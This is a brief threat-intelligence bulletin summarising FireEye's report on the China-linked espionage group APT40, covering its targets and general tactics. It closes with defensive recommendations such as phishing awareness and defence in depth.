APT40: Examining a China-Nexus Espionage Actor
(Mar 4, 2019)
A new Advanced Persistent Threat (APT) group "APT40," has been announced by researchers from FireEye that are tied to a 2016 campaign that targeted defence, education, engineering, maritime, and transportation infrastructure. The APT group specifically targeted multiple countries including Belgium, Cambodia, Germany, Hong Kong, Malaysia, Norway, Philippines, Saudi Arabia, Switzerland, the United States, and the United Kingdom. APT40 was observed masquerading as an Unmanned Underwater Vehicle (UUV) manufacturer and attempted to illicitly acquire information and technology to help further advance China's naval capabilities. APT40 utilises web server exploitation, registered vulnerabilities, and malicious phishing documents, amongst other tactics, to get into a network and then use a variety of malware to conduct reconnaissance, escalate privileges, establish a foothold, and exfiltrate information back to the APT group.
Recommendation: Many attacks can be detected by less conventional methods, such as behaviour analysis, heuristic and machine learning-based detection systems. These attacks can be based on spear phishing, which is the best place to focus your energy - employee education can prevent these attacks before they can attempt exploitation. All users should be aware of the threats they face when doing something as simple as checking their email. In the case of compromise, the entire network must be assessed to identify the initial infection, and all affected systems must be fully wiped and reformatted to ensure the network is fully restored to a safe state. Defence-in-depth (layering of security mechanisms, redundancy, fail-safe defence processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.